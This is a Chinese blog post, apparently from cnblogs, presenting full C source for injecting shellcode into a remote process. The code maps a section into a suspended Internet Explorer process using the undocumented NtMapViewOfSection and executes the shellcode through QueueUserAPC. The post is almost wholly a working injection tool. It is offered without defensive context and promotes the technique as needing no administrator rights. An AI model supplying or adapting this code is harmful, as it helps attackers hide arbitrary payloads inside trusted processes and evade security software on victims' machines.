• NtMapViewOfSection注入



    新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求

    #define _WIN32_WINNT 0x0400
    #include <windows.h>
    
    typedef LONG NTSTATUS, *PNTSTATUS;
    #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
    
    typedef enum _SECTION_INHERIT 
    {
    ViewShare = 1,
    ViewUnmap = 2
    } SECTION_INHERIT;
    
    typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
    
    func_NtMapViewOfSection NtMapViewOfSection = NULL;
    
    
    LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, 
    DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )  
    {
    NTSTATUS Status;
    LARGE_INTEGER SectionOffset;
    ULONG ViewSize;
    ULONG Protect;
    LPVOID ViewBase;
    
    
    // 转换偏移量
    SectionOffset.LowPart = dwFileOffsetLow;
    SectionOffset.HighPart = dwFileOffsetHigh;
    
    // 保存大小和起始地址
    ViewBase = lpBaseAddress;
    ViewSize = dwNumberOfBytesToMap;
    
    // 转换标志为NT保护属性
    if (dwDesiredAccess & FILE_MAP_WRITE)
    {
    Protect = PAGE_READWRITE;
    }
    else if (dwDesiredAccess & FILE_MAP_READ)
    {
    Protect = PAGE_READONLY;
    }
    else if (dwDesiredAccess & FILE_MAP_COPY)
    {
    Protect = PAGE_WRITECOPY;
    }
    else
    {
    Protect = PAGE_NOACCESS;
    }
    
    //映射区段
    Status = NtMapViewOfSection(hFileMappingObject,
    hProcess,
    &ViewBase,
    0,
    0,
                &SectionOffset,
    &ViewSize,
                ViewShare,
                0,
    Protect);
    if (!NT_SUCCESS(Status))
    {
    // 失败
    return NULL;
    }
    
    //返回起始地址
       return ViewBase;
    }
    
    int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
    {
    HMODULE hDll = LoadLibrary( "ntdll.dll" );
    
    NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
    
    // 取ShellCode,任何你想实现的
    HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    
    HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    
    // 启动目标进程
    STARTUPINFO st; 
    ZeroMemory (&st, sizeof(st));
    st.cb = sizeof (STARTUPINFO);
    
    PROCESS_INFORMATION pi;
    ZeroMemory (&pi, sizeof(pi));
    
    CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
    
    
    // 注入shellcode到目标进程地址空间
    LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
    
    // 创建一个新的能够在目标线程恢复是首先执行的APC
    QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
    ResumeThread (pi.hThread);
    CloseHandle (hFile);
    CloseHandle (hMappedFile);
    CloseHandle (pi.hThread);
    CloseHandle (pi.hProcess);
    return 0;
    }


     

  • 相关阅读:
    mac 终端命令kill掉某个指定端口
    python web开发之flask框架学习(1) 创建flask项目
    ios json转model的简单现实
    SnapKit swift实现高度自适应的新浪微博布局
    IOS swift实现密码的显示与隐藏切换
    IOS UIWebView与js的简单交互swift3版
    android 手写万能adapter适配器
    简单几步实现 IOS UITextField输入长度的控制
    IOS Swift UITableViewcontroller实现点击空白处隐藏键盘
    xcode 版本控制推送代码到远程git仓库的步骤
  • 原文地址:https://www.cnblogs.com/hgy413/p/3693479.html
Copyright © 2020-2023  润新知